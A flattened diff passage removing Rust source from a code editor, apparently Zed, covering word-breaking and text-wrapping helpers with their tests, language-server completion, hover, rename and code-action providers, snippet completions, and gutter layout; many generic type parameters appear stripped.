&MultiBufferSnapshot, - range: Range, - language: &language::LanguageScope, -) -> bool { - let leading_whitespace_len = buffer - .reversed_chars_at(range.start) - .take_while(|c| c.is_whitespace() && *c != '\n') - .map(|c| c.len_utf8()) - .sum::(); - let trailing_whitespace_len = buffer - .chars_at(range.end) - .take_while(|c| c.is_whitespace() && *c != '\n') - .map(|c| c.len_utf8()) - .sum::(); - let range = range.start - leading_whitespace_len..range.end + trailing_whitespace_len; - - language.brackets().any(|(pair, enabled)| { - let pair_start = pair.start.trim_end(); - let pair_end = pair.end.trim_start(); - - enabled - && pair.newline - && buffer.contains_str_at(range.end, pair_end) - && buffer.contains_str_at(range.start.saturating_sub(pair_start.len()), pair_start) - }) -} - -fn insert_extra_newline_tree_sitter(buffer: &MultiBufferSnapshot, range: Range) -> bool { - let (buffer, range) = match buffer.range_to_buffer_ranges(range).as_slice() { - [(buffer, range, _)] => (*buffer, range.clone()), - _ => return false, - }; - let pair = { - let mut result: Option = None; - - for pair in buffer - .all_bracket_ranges(range.clone()) - .filter(move |pair| { - pair.open_range.start <= range.start && pair.close_range.end >= range.end - }) - { - let len = pair.close_range.end - pair.open_range.start; - - if let Some(existing) = &result { - let existing_len = existing.close_range.end - existing.open_range.start; - if len > existing_len { - continue; - } - } - - result = Some(pair); - } - - result - }; - let Some(pair) = pair else { - return false; - }; - pair.newline_only - && buffer - .chars_for_range(pair.open_range.end..range.start) - .chain(buffer.chars_for_range(range.end..pair.close_range.start)) - .all(|c| c.is_whitespace() && c != '\n') -} - -fn get_uncommitted_diff_for_buffer( - project: &Entity, - buffers: impl IntoIterator>, - buffer: Entity, - cx: &mut App, -) -> Task<()> { - let mut tasks = Vec::new(); - project.update(cx, |project, cx| { - for buffer in buffers { - if project::File::from_dyn(buffer.read(cx).file()).is_some() { - tasks.push(project.open_uncommitted_diff(buffer.clone(), cx)) - } - } - }); - cx.spawn(async move |cx| { - let diffs = future::join_all(tasks).await; - buffer - .update(cx, |buffer, cx| { - for diff in diffs.into_iter().flatten() { - buffer.add_diff(diff, cx); - } - }) - .ok(); - }) -} - -fn char_len_with_expanded_tabs(offset: usize, text: &str, tab_size: NonZeroU32) -> usize { - let tab_size = tab_size.get() as usize; - let mut width = offset; - - for ch in text.chars() { - width += if ch == '\t' { - tab_size - (width % tab_size) - } else { - 1 - }; - } - - width - offset -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_string_size_with_expanded_tabs() { - let nz = |val| NonZeroU32::new(val).unwrap(); - assert_eq!(char_len_with_expanded_tabs(0, "", nz(4)), 0); - assert_eq!(char_len_with_expanded_tabs(0, "hello", nz(4)), 5); - assert_eq!(char_len_with_expanded_tabs(0, "\thello", nz(4)), 9); - assert_eq!(char_len_with_expanded_tabs(0, "abc\tab", nz(4)), 6); - assert_eq!(char_len_with_expanded_tabs(0, "hello\t", nz(4)), 8); - assert_eq!(char_len_with_expanded_tabs(0, "\t\t", nz(8)), 16); - assert_eq!(char_len_with_expanded_tabs(0, "x\t", nz(8)), 8); - assert_eq!(char_len_with_expanded_tabs(7, "x\t", nz(8)), 9); - } -} - -/// Tokenizes a string into runs of text that should stick together, or that is whitespace. -struct WordBreakingTokenizer<'a> { - input: &'a str, -} - -impl<'a> WordBreakingTokenizer<'a> { - fn new(input: &'a str) -> Self { - Self { input } - } -} - -fn is_char_ideographic(ch: char) -> bool { - use unicode_script::Script::*; - use unicode_script::UnicodeScript; - matches!(ch.script(), Han | Tangut | Yi) -} - -fn is_grapheme_ideographic(text: &str) -> bool { - text.chars().any(is_char_ideographic) -} - -fn is_grapheme_whitespace(text: &str) -> bool { - text.chars().any(|x| x.is_whitespace()) -} - -fn should_stay_with_preceding_ideograph(text: &str) -> bool { - text.chars().next().map_or(false, |ch| { - matches!(ch, '。' | '、' | ',' | '?' | '!' | ':' | ';' | '…') - }) -} - -#[derive(PartialEq, Eq, Debug, Clone, Copy)] -enum WordBreakToken<'a> { - Word { token: &'a str, grapheme_len: usize }, - InlineWhitespace { token: &'a str, grapheme_len: usize }, - Newline, -} - -impl<'a> Iterator for WordBreakingTokenizer<'a> { - /// Yields a span, the count of graphemes in the token, and whether it was - /// whitespace. Note that it also breaks at word boundaries. - type Item = WordBreakToken<'a>; - - fn next(&mut self) -> Option { - use unicode_segmentation::UnicodeSegmentation; - if self.input.is_empty() { - return None; - } - - let mut iter = self.input.graphemes(true).peekable(); - let mut offset = 0; - let mut grapheme_len = 0; - if let Some(first_grapheme) = iter.next() { - let is_newline = first_grapheme == "\n"; - let is_whitespace = is_grapheme_whitespace(first_grapheme); - offset += first_grapheme.len(); - grapheme_len += 1; - if is_grapheme_ideographic(first_grapheme) && !is_whitespace { - if let Some(grapheme) = iter.peek().copied() { - if should_stay_with_preceding_ideograph(grapheme) { - offset += grapheme.len(); - grapheme_len += 1; - } - } - } else { - let mut words = self.input[offset..].split_word_bound_indices().peekable(); - let mut next_word_bound = words.peek().copied(); - if next_word_bound.map_or(false, |(i, _)| i == 0) { - next_word_bound = words.next(); - } - while let Some(grapheme) = iter.peek().copied() { - if next_word_bound.map_or(false, |(i, _)| i == offset) { - break; - }; - if is_grapheme_whitespace(grapheme) != is_whitespace - || (grapheme == "\n") != is_newline - { - break; - }; - offset += grapheme.len(); - grapheme_len += 1; - iter.next(); - } - } - let token = &self.input[..offset]; - self.input = &self.input[offset..]; - if token == "\n" { - Some(WordBreakToken::Newline) - } else if is_whitespace { - Some(WordBreakToken::InlineWhitespace { - token, - grapheme_len, - }) - } else { - Some(WordBreakToken::Word { - token, - grapheme_len, - }) - } - } else { - None - } - } -} - -#[test] -fn test_word_breaking_tokenizer() { - let tests: &[(&str, &[WordBreakToken<'static>])] = &[ - ("", &[]), - (" ", &[whitespace(" ", 2)]), - ("Ʒ", &[word("Ʒ", 1)]), - ("Ǽ", &[word("Ǽ", 1)]), - ("⋑", &[word("⋑", 1)]), - ("⋑⋑", &[word("⋑⋑", 2)]), - ( - "原理,进而", - &[word("原", 1), word("理,", 2), word("进", 1), word("而", 1)], - ), - ( - "hello world", - &[word("hello", 5), whitespace(" ", 1), word("world", 5)], - ), - ( - "hello, world", - &[word("hello,", 6), whitespace(" ", 1), word("world", 5)], - ), - ( - " hello world", - &[ - whitespace(" ", 2), - word("hello", 5), - whitespace(" ", 1), - word("world", 5), - ], - ), - ( - "这是什么 \n 钢笔", - &[ - word("这", 1), - word("是", 1), - word("什", 1), - word("么", 1), - whitespace(" ", 1), - newline(), - whitespace(" ", 1), - word("钢", 1), - word("笔", 1), - ], - ), - (" mutton", &[whitespace(" ", 1), word("mutton", 6)]), - ]; - - fn word(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { - WordBreakToken::Word { - token, - grapheme_len, - } - } - - fn whitespace(token: &'static str, grapheme_len: usize) -> WordBreakToken<'static> { - WordBreakToken::InlineWhitespace { - token, - grapheme_len, - } - } - - fn newline() -> WordBreakToken<'static> { - WordBreakToken::Newline - } - - for (input, result) in tests { - assert_eq!( - WordBreakingTokenizer::new(input) - .collect::>() - .as_slice(), - *result, - ); - } -} - -fn wrap_with_prefix( - line_prefix: String, - unwrapped_text: String, - wrap_column: usize, - tab_size: NonZeroU32, - preserve_existing_whitespace: bool, -) -> String { - let line_prefix_len = char_len_with_expanded_tabs(0, &line_prefix, tab_size); - let mut wrapped_text = String::new(); - let mut current_line = line_prefix.clone(); - - let tokenizer = WordBreakingTokenizer::new(&unwrapped_text); - let mut current_line_len = line_prefix_len; - let mut in_whitespace = false; - for token in tokenizer { - let have_preceding_whitespace = in_whitespace; - match token { - WordBreakToken::Word { - token, - grapheme_len, - } => { - in_whitespace = false; - if current_line_len + grapheme_len > wrap_column - && current_line_len != line_prefix_len - { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } - current_line.push_str(token); - current_line_len += grapheme_len; - } - WordBreakToken::InlineWhitespace { - mut token, - mut grapheme_len, - } => { - in_whitespace = true; - if have_preceding_whitespace && !preserve_existing_whitespace { - continue; - } - if !preserve_existing_whitespace { - token = " "; - grapheme_len = 1; - } - if current_line_len + grapheme_len > wrap_column { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if current_line_len != line_prefix_len || preserve_existing_whitespace { - current_line.push_str(token); - current_line_len += grapheme_len; - } - } - WordBreakToken::Newline => { - in_whitespace = true; - if preserve_existing_whitespace { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if have_preceding_whitespace { - continue; - } else if current_line_len + 1 > wrap_column && current_line_len != line_prefix_len - { - wrapped_text.push_str(current_line.trim_end()); - wrapped_text.push('\n'); - current_line.truncate(line_prefix.len()); - current_line_len = line_prefix_len; - } else if current_line_len != line_prefix_len { - current_line.push(' '); - current_line_len += 1; - } - } - } - } - - if !current_line.is_empty() { - wrapped_text.push_str(¤t_line); - } - wrapped_text -} - -#[test] -fn test_wrap_with_prefix() { - assert_eq!( - wrap_with_prefix( - "# ".to_string(), - "abcdefg".to_string(), - 4, - NonZeroU32::new(4).unwrap(), - false, - ), - "# abcdefg" - ); - assert_eq!( - wrap_with_prefix( - "".to_string(), - "\thello world".to_string(), - 8, - NonZeroU32::new(4).unwrap(), - false, - ), - "hello\nworld" - ); - assert_eq!( - wrap_with_prefix( - "// ".to_string(), - "xx \nyy zz aa bb cc".to_string(), - 12, - NonZeroU32::new(4).unwrap(), - false, - ), - "// xx yy zz\n// aa bb cc" - ); - assert_eq!( - wrap_with_prefix( - String::new(), - "这是什么 \n 钢笔".to_string(), - 3, - NonZeroU32::new(4).unwrap(), - false, - ), - "这是什\n么 钢\n笔" - ); -} - -pub trait CollaborationHub { - fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap; - fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap; - fn user_names(&self, cx: &App) -> HashMap; -} - -impl CollaborationHub for Entity { - fn collaborators<'a>(&self, cx: &'a App) -> &'a HashMap { - self.read(cx).collaborators() - } - - fn user_participant_indices<'a>(&self, cx: &'a App) -> &'a HashMap { - self.read(cx).user_store().read(cx).participant_indices() - } - - fn user_names(&self, cx: &App) -> HashMap { - let this = self.read(cx); - let user_ids = this.collaborators().values().map(|c| c.user_id); - this.user_store().read_with(cx, |user_store, cx| { - user_store.participant_names(user_ids, cx) - }) - } -} - -pub trait SemanticsProvider { - fn hover( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>; - - fn inline_values( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>>; - - fn inlay_hints( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>>; - - fn resolve_inlay_hint( - &self, - hint: InlayHint, - buffer_handle: Entity, - server_id: LanguageServerId, - cx: &mut App, - ) -> Option>>; - - fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool; - - fn document_highlights( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>; - - fn definitions( - &self, - buffer: &Entity, - position: text::Anchor, - kind: GotoDefinitionKind, - cx: &mut App, - ) -> Option>>>; - - fn range_for_rename( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>>; - - fn perform_rename( - &self, - buffer: &Entity, - position: text::Anchor, - new_name: String, - cx: &mut App, - ) -> Option>>; -} - -pub trait CompletionProvider { - fn completions( - &self, - excerpt_id: ExcerptId, - buffer: &Entity, - buffer_position: text::Anchor, - trigger: CompletionContext, - window: &mut Window, - cx: &mut Context, - ) -> Task>>>; - - fn resolve_completions( - &self, - buffer: Entity, - completion_indices: Vec, - completions: Rc>>, - cx: &mut Context, - ) -> Task>; - - fn apply_additional_edits_for_completion( - &self, - _buffer: Entity, - _completions: Rc>>, - _completion_index: usize, - _push_to_history: bool, - _cx: &mut Context, - ) -> Task>> { - Task::ready(Ok(None)) - } - - fn is_completion_trigger( - &self, - buffer: &Entity, - position: language::Anchor, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool; - - fn sort_completions(&self) -> bool { - true - } - - fn filter_completions(&self) -> bool { - true - } -} - -pub trait CodeActionProvider { - fn id(&self) -> Arc; - - fn code_actions( - &self, - buffer: &Entity, - range: Range, - window: &mut Window, - cx: &mut App, - ) -> Task>>; - - fn apply_code_action( - &self, - buffer_handle: Entity, - action: CodeAction, - excerpt_id: ExcerptId, - push_to_history: bool, - window: &mut Window, - cx: &mut App, - ) -> Task>; -} - -impl CodeActionProvider for Entity { - fn id(&self) -> Arc { - "project".into() - } - - fn code_actions( - &self, - buffer: &Entity, - range: Range, - _window: &mut Window, - cx: &mut App, - ) -> Task>> { - self.update(cx, |project, cx| { - let code_lens = project.code_lens(buffer, range.clone(), cx); - let code_actions = project.code_actions(buffer, range, None, cx); - cx.background_spawn(async move { - let (code_lens, code_actions) = join(code_lens, code_actions).await; - Ok(code_lens - .context("code lens fetch")? - .into_iter() - .chain(code_actions.context("code action fetch")?) - .collect()) - }) - }) - } - - fn apply_code_action( - &self, - buffer_handle: Entity, - action: CodeAction, - _excerpt_id: ExcerptId, - push_to_history: bool, - _window: &mut Window, - cx: &mut App, - ) -> Task> { - self.update(cx, |project, cx| { - project.apply_code_action(buffer_handle, action, push_to_history, cx) - }) - } -} - -fn snippet_completions( - project: &Project, - buffer: &Entity, - buffer_position: text::Anchor, - cx: &mut App, -) -> Task>> { - let languages = buffer.read(cx).languages_at(buffer_position); - let snippet_store = project.snippets().read(cx); - - let scopes: Vec<_> = languages - .iter() - .filter_map(|language| { - let language_name = language.lsp_id(); - let snippets = snippet_store.snippets_for(Some(language_name), cx); - - if snippets.is_empty() { - None - } else { - Some((language.default_scope(), snippets)) - } - }) - .collect(); - - if scopes.is_empty() { - return Task::ready(Ok(vec![])); - } - - let snapshot = buffer.read(cx).text_snapshot(); - let chars: String = snapshot - .reversed_chars_for_range(text::Anchor::MIN..buffer_position) - .collect(); - let executor = cx.background_executor().clone(); - - cx.background_spawn(async move { - let mut all_results: Vec = Vec::new(); - for (scope, snippets) in scopes.into_iter() { - let classifier = CharClassifier::new(Some(scope)).for_completion(true); - let mut last_word = chars - .chars() - .take_while(|c| classifier.is_word(*c)) - .collect::(); - last_word = last_word.chars().rev().collect(); - - if last_word.is_empty() { - return Ok(vec![]); - } - - let as_offset = text::ToOffset::to_offset(&buffer_position, &snapshot); - let to_lsp = |point: &text::Anchor| { - let end = text::ToPointUtf16::to_point_utf16(point, &snapshot); - point_to_lsp(end) - }; - let lsp_end = to_lsp(&buffer_position); - - let candidates = snippets - .iter() - .enumerate() - .flat_map(|(ix, snippet)| { - snippet - .prefix - .iter() - .map(move |prefix| StringMatchCandidate::new(ix, &prefix)) - }) - .collect::>(); - - let mut matches = fuzzy::match_strings( - &candidates, - &last_word, - last_word.chars().any(|c| c.is_uppercase()), - 100, - &Default::default(), - executor.clone(), - ) - .await; - - // Remove all candidates where the query's start does not match the start of any word in the candidate - if let Some(query_start) = last_word.chars().next() { - matches.retain(|string_match| { - split_words(&string_match.string).any(|word| { - // Check that the first codepoint of the word as lowercase matches the first - // codepoint of the query as lowercase - word.chars() - .flat_map(|codepoint| codepoint.to_lowercase()) - .zip(query_start.to_lowercase()) - .all(|(word_cp, query_cp)| word_cp == query_cp) - }) - }); - } - - let matched_strings = matches - .into_iter() - .map(|m| m.string) - .collect::>(); - - let mut result: Vec = snippets - .iter() - .filter_map(|snippet| { - let matching_prefix = snippet - .prefix - .iter() - .find(|prefix| matched_strings.contains(*prefix))?; - let start = as_offset - last_word.len(); - let start = snapshot.anchor_before(start); - let range = start..buffer_position; - let lsp_start = to_lsp(&start); - let lsp_range = lsp::Range { - start: lsp_start, - end: lsp_end, - }; - Some(Completion { - replace_range: range, - new_text: snippet.body.clone(), - source: CompletionSource::Lsp { - insert_range: None, - server_id: LanguageServerId(usize::MAX), - resolved: true, - lsp_completion: Box::new(lsp::CompletionItem { - label: snippet.prefix.first().unwrap().clone(), - kind: Some(CompletionItemKind::SNIPPET), - label_details: snippet.description.as_ref().map(|description| { - lsp::CompletionItemLabelDetails { - detail: Some(description.clone()), - description: None, - } - }), - insert_text_format: Some(InsertTextFormat::SNIPPET), - text_edit: Some(lsp::CompletionTextEdit::InsertAndReplace( - lsp::InsertReplaceEdit { - new_text: snippet.body.clone(), - insert: lsp_range, - replace: lsp_range, - }, - )), - filter_text: Some(snippet.body.clone()), - sort_text: Some(char::MAX.to_string()), - ..lsp::CompletionItem::default() - }), - lsp_defaults: None, - }, - label: CodeLabel { - text: matching_prefix.clone(), - runs: Vec::new(), - filter_range: 0..matching_prefix.len(), - }, - icon_path: None, - documentation: snippet.description.clone().map(|description| { - CompletionDocumentation::SingleLine(description.into()) - }), - insert_text_mode: None, - confirm: None, - }) - }) - .collect(); - - all_results.append(&mut result); - } - - Ok(all_results) - }) -} - -impl CompletionProvider for Entity { - fn completions( - &self, - _excerpt_id: ExcerptId, - buffer: &Entity, - buffer_position: text::Anchor, - options: CompletionContext, - _window: &mut Window, - cx: &mut Context, - ) -> Task>>> { - self.update(cx, |project, cx| { - let snippets = snippet_completions(project, buffer, buffer_position, cx); - let project_completions = project.completions(buffer, buffer_position, options, cx); - cx.background_spawn(async move { - let snippets_completions = snippets.await?; - match project_completions.await? { - Some(mut completions) => { - completions.extend(snippets_completions); - Ok(Some(completions)) - } - None => { - if snippets_completions.is_empty() { - Ok(None) - } else { - Ok(Some(snippets_completions)) - } - } - } - }) - }) - } - - fn resolve_completions( - &self, - buffer: Entity, - completion_indices: Vec, - completions: Rc>>, - cx: &mut Context, - ) -> Task> { - self.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.resolve_completions(buffer, completion_indices, completions, cx) - }) - }) - } - - fn apply_additional_edits_for_completion( - &self, - buffer: Entity, - completions: Rc>>, - completion_index: usize, - push_to_history: bool, - cx: &mut Context, - ) -> Task>> { - self.update(cx, |project, cx| { - project.lsp_store().update(cx, |lsp_store, cx| { - lsp_store.apply_additional_edits_for_completion( - buffer, - completions, - completion_index, - push_to_history, - cx, - ) - }) - }) - } - - fn is_completion_trigger( - &self, - buffer: &Entity, - position: language::Anchor, - text: &str, - trigger_in_words: bool, - cx: &mut Context, - ) -> bool { - let mut chars = text.chars(); - let char = if let Some(char) = chars.next() { - char - } else { - return false; - }; - if chars.next().is_some() { - return false; - } - - let buffer = buffer.read(cx); - let snapshot = buffer.snapshot(); - if !snapshot.settings_at(position, cx).show_completions_on_input { - return false; - } - let classifier = snapshot.char_classifier_at(position).for_completion(true); - if trigger_in_words && classifier.is_word(char) { - return true; - } - - buffer.completion_triggers().contains(text) - } -} - -impl SemanticsProvider for Entity { - fn hover( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| project.hover(buffer, position, cx))) - } - - fn document_highlights( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>> { - Some(self.update(cx, |project, cx| { - project.document_highlights(buffer, position, cx) - })) - } - - fn definitions( - &self, - buffer: &Entity, - position: text::Anchor, - kind: GotoDefinitionKind, - cx: &mut App, - ) -> Option>>> { - Some(self.update(cx, |project, cx| match kind { - GotoDefinitionKind::Symbol => project.definition(&buffer, position, cx), - GotoDefinitionKind::Declaration => project.declaration(&buffer, position, cx), - GotoDefinitionKind::Type => project.type_definition(&buffer, position, cx), - GotoDefinitionKind::Implementation => project.implementation(&buffer, position, cx), - })) - } - - fn supports_inlay_hints(&self, buffer: &Entity, cx: &mut App) -> bool { - // TODO: make this work for remote projects - self.update(cx, |project, cx| { - if project - .active_debug_session(cx) - .is_some_and(|(session, _)| session.read(cx).any_stopped_thread()) - { - return true; - } - - buffer.update(cx, |buffer, cx| { - project.any_language_server_supports_inlay_hints(buffer, cx) - }) - }) - } - - fn inline_values( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>> { - self.update(cx, |project, cx| { - let (session, active_stack_frame) = project.active_debug_session(cx)?; - - Some(project.inline_values(session, active_stack_frame, buffer_handle, range, cx)) - }) - } - - fn inlay_hints( - &self, - buffer_handle: Entity, - range: Range, - cx: &mut App, - ) -> Option>>> { - Some(self.update(cx, |project, cx| { - project.inlay_hints(buffer_handle, range, cx) - })) - } - - fn resolve_inlay_hint( - &self, - hint: InlayHint, - buffer_handle: Entity, - server_id: LanguageServerId, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| { - project.resolve_inlay_hint(hint, buffer_handle, server_id, cx) - })) - } - - fn range_for_rename( - &self, - buffer: &Entity, - position: text::Anchor, - cx: &mut App, - ) -> Option>>>> { - Some(self.update(cx, |project, cx| { - let buffer = buffer.clone(); - let task = project.prepare_rename(buffer.clone(), position, cx); - cx.spawn(async move |_, cx| { - Ok(match task.await? { - PrepareRenameResponse::Success(range) => Some(range), - PrepareRenameResponse::InvalidPosition => None, - PrepareRenameResponse::OnlyUnpreparedRenameSupported => { - // Fallback on using TreeSitter info to determine identifier range - buffer.update(cx, |buffer, _| { - let snapshot = buffer.snapshot(); - let (range, kind) = snapshot.surrounding_word(position); - if kind != Some(CharKind::Word) { - return None; - } - Some( - snapshot.anchor_before(range.start) - ..snapshot.anchor_after(range.end), - ) - })? - } - }) - }) - })) - } - - fn perform_rename( - &self, - buffer: &Entity, - position: text::Anchor, - new_name: String, - cx: &mut App, - ) -> Option>> { - Some(self.update(cx, |project, cx| { - project.perform_rename(buffer.clone(), position, new_name, cx) - })) - } -} - -fn inlay_hint_settings( - location: Anchor, - snapshot: &MultiBufferSnapshot, - cx: &mut Context, -) -> InlayHintSettings { - let file = snapshot.file_at(location); - let language = snapshot.language_at(location).map(|l| l.name()); - language_settings(cx).language(language).file(file).get().inlay_hints -} - -fn consume_contiguous_rows( - contiguous_row_selections: &mut Vec>, - selection: &Selection, - display_map: &DisplaySnapshot, - selections: &mut Peekable>>, -) -> (MultiBufferRow, MultiBufferRow) { - contiguous_row_selections.push(selection.clone()); - let start_row = MultiBufferRow(selection.start.row); - let mut end_row = ending_row(selection, display_map); - - while let Some(next_selection) = selections.peek() { - if next_selection.start.row <= end_row.0 { - end_row = ending_row(next_selection, display_map); - contiguous_row_selections.push(selections.next().unwrap().clone()); - } else { - break; - } - } - (start_row, end_row) -} - -fn ending_row(next_selection: &Selection, display_map: &DisplaySnapshot) -> MultiBufferRow { - if next_selection.end.column > 0 || next_selection.is_empty() { - MultiBufferRow(display_map.next_line_boundary(next_selection.end).0.row + 1) - } else { - MultiBufferRow(next_selection.end.row) - } -} - -impl EditorSnapshot { - pub fn remote_selections_in_range<'a>( - &'a self, - range: &'a Range, - collaboration_hub: &dyn CollaborationHub, - cx: &'a App, - ) -> impl 'a + Iterator { - let participant_names = collaboration_hub.user_names(cx); - let participant_indices = collaboration_hub.user_participant_indices(cx); - let collaborators_by_peer_id = collaboration_hub.collaborators(cx); - let collaborators_by_replica_id = collaborators_by_peer_id - .iter() - .map(|(_, collaborator)| (collaborator.replica_id, collaborator)) - .collect::>(); - self.buffer_snapshot - .selections_in_range(range, false) - .filter_map(move |(replica_id, line_mode, cursor_shape, selection)| { - let collaborator = collaborators_by_replica_id.get(&replica_id)?; - let participant_index = participant_indices.get(&collaborator.user_id).copied(); - let user_name = participant_names.get(&collaborator.user_id).cloned(); - Some(RemoteSelection { - replica_id, - selection, - cursor_shape, - line_mode, - participant_index, - peer_id: collaborator.peer_id, - user_name, - }) - }) - } - - pub fn hunks_for_ranges( - &self, - ranges: impl IntoIterator>, - ) -> Vec { - let mut hunks = Vec::new(); - let mut processed_buffer_rows: HashMap>> = - HashMap::default(); - for query_range in ranges { - let query_rows = - MultiBufferRow(query_range.start.row)..MultiBufferRow(query_range.end.row + 1); - for hunk in self.buffer_snapshot.diff_hunks_in_range( - Point::new(query_rows.start.0, 0)..Point::new(query_rows.end.0, 0), - ) { - // Include deleted hunks that are adjacent to the query range, because - // otherwise they would be missed. - let mut intersects_range = hunk.row_range.overlaps(&query_rows); - if hunk.status().is_deleted() { - intersects_range |= hunk.row_range.start == query_rows.end; - intersects_range |= hunk.row_range.end == query_rows.start; - } - if intersects_range { - if !processed_buffer_rows - .entry(hunk.buffer_id) - .or_default() - .insert(hunk.buffer_range.start..hunk.buffer_range.end) - { - continue; - } - hunks.push(hunk); - } - } - } - - hunks - } - - fn display_diff_hunks_for_rows<'a>( - &'a self, - display_rows: Range, - folded_buffers: &'a HashSet, - ) -> impl 'a + Iterator { - let buffer_start = DisplayPoint::new(display_rows.start, 0).to_point(self); - let buffer_end = DisplayPoint::new(display_rows.end, 0).to_point(self); - - self.buffer_snapshot - .diff_hunks_in_range(buffer_start..buffer_end) - .filter_map(|hunk| { - if folded_buffers.contains(&hunk.buffer_id) { - return None; - } - - let hunk_start_point = Point::new(hunk.row_range.start.0, 0); - let hunk_end_point = Point::new(hunk.row_range.end.0, 0); - - let hunk_display_start = self.point_to_display_point(hunk_start_point, Bias::Left); - let hunk_display_end = self.point_to_display_point(hunk_end_point, Bias::Right); - - let display_hunk = if hunk_display_start.column() != 0 { - DisplayDiffHunk::Folded { - display_row: hunk_display_start.row(), - } - } else { - let mut end_row = hunk_display_end.row(); - if hunk_display_end.column() > 0 { - end_row.0 += 1; - } - let is_created_file = hunk.is_created_file(); - DisplayDiffHunk::Unfolded { - status: hunk.status(), - diff_base_byte_range: hunk.diff_base_byte_range, - display_row_range: hunk_display_start.row()..end_row, - multi_buffer_range: Anchor::range_in_buffer( - hunk.excerpt_id, - hunk.buffer_id, - hunk.buffer_range, - ), - is_created_file, - } - }; - - Some(display_hunk) - }) - } - - pub fn language_at(&self, position: T) -> Option<&Arc> { - self.display_snapshot.buffer_snapshot.language_at(position) - } - - pub fn is_focused(&self) -> bool { - self.is_focused - } - - pub fn placeholder_text(&self) -> Option<&Arc> { - self.placeholder_text.as_ref() - } - - pub fn scroll_position(&self) -> gpui::Point { - self.scroll_anchor.scroll_position(&self.display_snapshot) - } - - fn gutter_dimensions( - &self, - font_id: FontId, - font_size: Pixels, - max_line_number_width: Pixels, - cx: &App, - ) -> Option { - if !self.show_gutter { - return None; - } - - let descent = cx.text_system().descent(font_id, font_size); - let em_width = cx.text_system().em_width(font_id, font_size).log_err()?; - let em_advance = cx.text_system().em_advance(font_id, font_size).log_err()?; - - let show_git_gutter = self.show_git_diff_gutter.unwrap_or_else(|| { - matches!( - ProjectSettings::get_global(cx).git.git_gutter, - Some(GitGutterSetting::TrackedFiles) - ) - }); - let gutter_settings = EditorSettings::get_global(cx).gutter; - let show_line_numbers = self - .show_line_numbers - .unwrap_or(gutter_settings.line_numbers); - let line_gutter_width = if show_line_numbers { - // Avoid flicker-like gutter resizes when the line number gains another digit and only resize the gutter on files with N*10^5 lines. - let min_width_for_number_on_gutter = em_advance * MIN_LINE_NUMBER_DIGITS as f32; - max_line_number_width.max(min_width_for_number_on_gutter) - } else { - 0.0.into() - }; - - let show_code_actions = self - .show_code_actions - .unwrap_or(gutter_settings.code_actions); - - let show_runnables = self.show_runnables.unwrap_or(gutter_settings.runnables); - let show_breakpoints = self.show_breakpoints.unwrap_or(gutter_settings.breakpoints); - - let git_blame_entries_width = - self.git_blame_gutter_max_author_length - .map(|max_author_length| { - let renderer = cx.global::().0.clone(); - const MAX_RELATIVE_TIMESTAMP: &str = "60 minutes ago"; - - /// The number of characters to dedicate to gaps and margins. - const SPACING_WIDTH: usize = 4; - - let max_char_count = max_author_length.min(renderer.max_author_length()) - + ::git::SHORT_SHA_LENGTH - + MAX_RELATIVE_TIMESTAMP.len() - + SPACING_WIDTH; - - em_advance * max_char_count - }); - - let is_singleton = self.buffer_snapshot.is_singleton(); - - let mut left_padding = git_blame_entries_width.unwrap_or(Pixels::ZERO); - left_padding += if !is_singleton { - em_width * 4.0 - } else if show_code_actions || show_runnables || show_breakpoints { - em_width * 3.0 - } else if show_git_gutter && show_line_numbers { - em_width * 2.0 - } else if show_git_gutter || show_line_numbers { - em_width - } else { - px(0.) - }; - - let shows_folds = is_singleton && gutter_settings.folds; - - let right_padding = if shows_folds && show_line_numbers { - em_width * 4.0 - } else if shows_folds || (!is_singleton && show_line_numbers) { - em_width * 3.0 - } else if show_line_numbers { - em_width - } else { - px(0.) - }; - - Some(GutterDimensions { - left_padding, - right_padding, - width: line_gutter_width + left_padding + right_padding, - margin: -descent, - git_blame_entries_width, - }) - } - - pub fn render_crease_toggle( - &self, - buffer_row: MultiBufferRow, - row_contains_cursor: bool, - editor: Entity, - window: &mut Window, - cx: &mut App, - ) -> Option { - let folded = self.is_line_folded(buffer_row); - let mut is_foldable = false; - - if let Some(crease) = self - .crease_snapshot - .query_row(buffer_row, &self.buffer_snapshot) - { - is_foldable = true; - match crease { - Crease::Inline { render_toggle, .. } | Crease::Block { render_toggle, .. } => { - if let Some(render_toggle) = render_toggle { - let toggle_callback = - Arc::new(move |folded, window: &mut Window, cx: &mut App| { - if folded { - editor.update(cx, |editor, cx| { - editor.fold_at(buffer_row, window, cx) - }); - } else { - editor.update(cx, |editor, cx| { - editor.unfold_at(buffer_row, window, cx) - }); - } - }); - return Some((render_toggle)( - buffer_row, - folded, - toggle_callback, - window, - cx, - )); - } - } - } - } - - is_foldable |= self.starts_indent(buffer_row); - - if folded || (is_foldable && (row_contains_cursor || self.gutter_hovered)) { - Some( - Disclosure::new(("gutter_crease", buffer_row.0), !folded) - .toggle_state(folded) - .on_click(window.listener_for(&editor, move |this, _e, window, cx| { - if folded { - this.unfold_at(buffer_row, window, cx); - } else { - 